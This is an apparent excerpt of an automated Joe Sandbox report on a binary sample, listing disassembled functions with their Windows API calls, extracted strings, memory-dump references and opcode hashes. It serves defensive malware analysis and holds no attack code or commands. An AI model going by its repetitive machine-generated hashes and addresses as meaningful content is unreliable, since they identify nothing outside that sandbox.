                                                                                                                    • Instruction Fuzzy Hash: 3A619F30630B41EFCB3AAF19CD88B6677F5FB50352F908829E4465A570C7B0A8A5DF51
                                                                                                                    Function 002B21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B25DB: GetWindowLongW.USER32(?,000000EB), ref: 002B25EC
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002B21D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259745315-0
                                                                                                                    • Opcode ID: c10453f0865b379a39e07a1fcf51a954c967e7097c1f5044edc087946144e519
                                                                                                                    • Instruction ID: 584f6cb6bab797ce27d1a637aee67e1bac86b8546e09b81ff28b0131eb9da08f
                                                                                                                    • Opcode Fuzzy Hash: c10453f0865b379a39e07a1fcf51a954c967e7097c1f5044edc087946144e519
                                                                                                                    • Instruction Fuzzy Hash: E141F130410245EFDB265F28EC88BF93B69EB06371F584265FEA5CA1E2C7718C56DB21
                                                                                                                    Function 0031A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,0033F910), ref: 0031A90B
                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,003689A0,00000061), ref: 0031A9D5
                                                                                                                    • _wcscpy.LIBCMT ref: 0031A9FF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                    • Opcode ID: c86a38054b117c3713fe8792912e4f78e663d5828565c01d30fc4ef6ffd7afbe
                                                                                                                    • Instruction ID: f8bbc0a142c4d415aa9fde6274562ad6c20073e95c9ed4aa7c6dd246bb89ed1d
                                                                                                                    • Opcode Fuzzy Hash: c86a38054b117c3713fe8792912e4f78e663d5828565c01d30fc4ef6ffd7afbe
                                                                                                                    • Instruction Fuzzy Hash: EB51BE311283019FC30AEF14C892AEFB7E9EF88341F05492DF595572A2DB319D99CA53
                                                                                                                    Function 002B9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                    • Opcode ID: 4680dcd53d02661639ef97c55424f29d517f4ae512e6475ad7a78f313659175d
                                                                                                                    • Instruction ID: 61c43df24cebee7bf54b5e76dabfed8a333738cff0daa8fbe75056d274673c79
                                                                                                                    • Opcode Fuzzy Hash: 4680dcd53d02661639ef97c55424f29d517f4ae512e6475ad7a78f313659175d
                                                                                                                    • Instruction Fuzzy Hash: 48411571530206AFDB24DF35C942EBA73E9FF46340F6044AEE549DB292EA719D61CB10
                                                                                                                    Function 00337152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0033716A
                                                                                                                    • CreateMenu.USER32 ref: 00337185
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00337194
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00337221
                                                                                                                    • IsMenu.USER32(?), ref: 00337237
                                                                                                                    • CreatePopupMenu.USER32 ref: 00337241
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0033726E
                                                                                                                    • DrawMenuBar.USER32 ref: 00337276
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                    • Opcode ID: 502f9f2fd70eda0b20167d28ed2b5fc1f08434b979d9fa1fae61b5600c0ca30d
                                                                                                                    • Instruction ID: 6a21a14f16b801a1f810a5637eb7130e81ccfb0636c9ede70620d05ce29d614e
                                                                                                                    • Opcode Fuzzy Hash: 502f9f2fd70eda0b20167d28ed2b5fc1f08434b979d9fa1fae61b5600c0ca30d
                                                                                                                    • Instruction Fuzzy Hash: 7C4177B5A01209EFEB22DFA4D884F9ABBB9FF09311F150428F945A7360D731A910CF90
                                                                                                                    Function 003374BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0033755E
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00337565
                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00337578
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00337580
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0033758B
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00337594
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0033759E
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003375B2
                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003375BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                    • Opcode ID: 234ca76f15619aba213570365bb16b5ed5fa31afa388479c53c96e5ecb05218f
                                                                                                                    • Instruction ID: 567c711b97298197f372b117f8eabee360a6a697a3c2d05712a521401f598406
                                                                                                                    • Opcode Fuzzy Hash: 234ca76f15619aba213570365bb16b5ed5fa31afa388479c53c96e5ecb05218f
                                                                                                                    • Instruction Fuzzy Hash: CD316A72505215BFEF269F64DC89FEA3B6DEF0A361F110224FA15A60A0C735D821DBA4
                                                                                                                    Function 002D6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002D6E3E
                                                                                                                      • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
                                                                                                                    • __gmtime64_s.LIBCMT ref: 002D6ED7
                                                                                                                    • __gmtime64_s.LIBCMT ref: 002D6F0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 002D6F2A
                                                                                                                    • __allrem.LIBCMT ref: 002D6F80
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D6F9C
                                                                                                                    • __allrem.LIBCMT ref: 002D6FB3
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D6FD1
                                                                                                                    • __allrem.LIBCMT ref: 002D6FE8
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D7006
                                                                                                                    • __invoke_watson.LIBCMT ref: 002D7077
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction ID: c829cda6d755b9f4228ce525a6ac666f6e13e6f906c6519b7a0464a7c0d40a17
                                                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction Fuzzy Hash: 8471F372A60B17ABD714EE69DC45B6AB3A8AF14320F14822BF514D73C1F774DD608B90
                                                                                                                    Function 00312527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312542
                                                                                                                    • GetMenuItemInfoW.USER32(00375890,000000FF,00000000,00000030), ref: 003125A3
                                                                                                                    • SetMenuItemInfoW.USER32(00375890,00000004,00000000,00000030), ref: 003125D9
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 003125EB
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0031262F
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0031264B
                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00312675
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 003126BA
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00312700
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00312714
                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00312735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4176008265-0
                                                                                                                    • Opcode ID: 80f8e85f4029a350202fc5524fdea33c12afb61f105e47f6e58e6d2fd626637c
                                                                                                                    • Instruction ID: fac4b71cce8dffa47b74b23656ec2bea2c10079079c92e7e11cc39c7187a9d3c
                                                                                                                    • Opcode Fuzzy Hash: 80f8e85f4029a350202fc5524fdea33c12afb61f105e47f6e58e6d2fd626637c
                                                                                                                    • Instruction Fuzzy Hash: 85619D70900249AFDB2BCF64CC88DEFBBB9EB0A304F550459E841A7291D771ADA5DB20
                                                                                                                    Function 00336F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00336FA5
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00336FA8
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00336FCC
                                                                                                                    • _memset.LIBCMT ref: 00336FDD
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00336FEF
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00337067
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 830647256-0
                                                                                                                    • Opcode ID: 393426dc236d085852f2f43e7a979f851d2fc412181b367c641534da18c5d3e3
                                                                                                                    • Instruction ID: 3975717ca04e44d584c97723291a46ff49f6847ab03aabf585bcaca3b432df4a
                                                                                                                    • Opcode Fuzzy Hash: 393426dc236d085852f2f43e7a979f851d2fc412181b367c641534da18c5d3e3
                                                                                                                    • Instruction Fuzzy Hash: 3A615BB5A00248AFDB22DFA4CC81EEE77F8EB09710F144159FA14EB2A1C775AD45DB90
                                                                                                                    Function 00306B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00306BBF
                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00306C18
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00306C2A
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00306C4A
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00306C9D
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00306CB1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00306CC6
                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00306CD3
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00306CDC
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00306CEE
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00306CF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706829360-0
                                                                                                                    • Opcode ID: 0c00f32316f2fd1b81970c2244a2dba97577edd262c337e1111d1a4356d3ea33
                                                                                                                    • Instruction ID: 8dce57b7d533da0d5ffad17d0347cf23458c74c97c6c58c085ddbc79226f3371
                                                                                                                    • Opcode Fuzzy Hash: 0c00f32316f2fd1b81970c2244a2dba97577edd262c337e1111d1a4356d3ea33
                                                                                                                    • Instruction Fuzzy Hash: DE416E71E00219AFDF01DFA9D8959AEBBBDEF08354F008069E955E7261CB30A955CFA0
                                                                                                                    Function 00325732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00325793
                                                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 003257D8
                                                                                                                    • gethostbyname.WSOCK32(?), ref: 003257E4
                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 003257F2
                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00325862
                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00325878
                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003258ED
                                                                                                                    • WSACleanup.WSOCK32 ref: 003258F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                    • String ID: Ping
                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                    • Opcode ID: 82c54b87a6ba936947ff6303c53d9781750ef104640e2b8c547d35e32ed84ec8
                                                                                                                    • Instruction ID: e473e1cb66308ea4af03e2c38bca44c631b4caf8a094eede715107c856582a13
                                                                                                                    • Opcode Fuzzy Hash: 82c54b87a6ba936947ff6303c53d9781750ef104640e2b8c547d35e32ed84ec8
                                                                                                                    • Instruction Fuzzy Hash: 73518F31A047109FD712EF24EC89B6AB7E8EF49750F048929F956DB2A1DB70E940DF42
                                                                                                                    Function 0031B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0031B4D0
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0031B546
                                                                                                                    • GetLastError.KERNEL32 ref: 0031B550
                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0031B5BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: aed04a00b3bab87ae3446ced1d94605e460a921b6aaa71ac1738d1fdf07f23a2
                                                                                                                    • Instruction ID: 6fe335b5da9cae96bace48d4d3d36be37354dcb1e658a3dfadb62aa77184d673
                                                                                                                    • Opcode Fuzzy Hash: aed04a00b3bab87ae3446ced1d94605e460a921b6aaa71ac1738d1fdf07f23a2
                                                                                                                    • Instruction Fuzzy Hash: 18318335A00209DFCB16EB68C885EEDBBB9FF4E350F148125E505DB291DB719A82CB51
                                                                                                                    Function 00308F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00309014
                                                                                                                    • GetDlgCtrlID.USER32 ref: 0030901F
                                                                                                                    • GetParent.USER32 ref: 0030903B
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0030903E
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00309047
                                                                                                                    • GetParent.USER32(?), ref: 00309063
                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00309066
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: 4f1c90ec11ce285cafb604a2d7d02d85c24d90ab1d3a15d991021ee7102ca928
                                                                                                                    • Instruction ID: a664a17a9e8bcf67613526182bc36de36c7f88870ff83b4536540b6ff4556615
                                                                                                                    • Opcode Fuzzy Hash: 4f1c90ec11ce285cafb604a2d7d02d85c24d90ab1d3a15d991021ee7102ca928
                                                                                                                    • Instruction Fuzzy Hash: 3E21C470E00208BFDF06ABA0CC96EFEBB79EF45310F50415AF961972E2DB755815DA20
                                                                                                                    Function 0030907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003090FD
                                                                                                                    • GetDlgCtrlID.USER32 ref: 00309108
                                                                                                                    • GetParent.USER32 ref: 00309124
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00309127
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00309130
                                                                                                                    • GetParent.USER32(?), ref: 0030914C
                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0030914F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
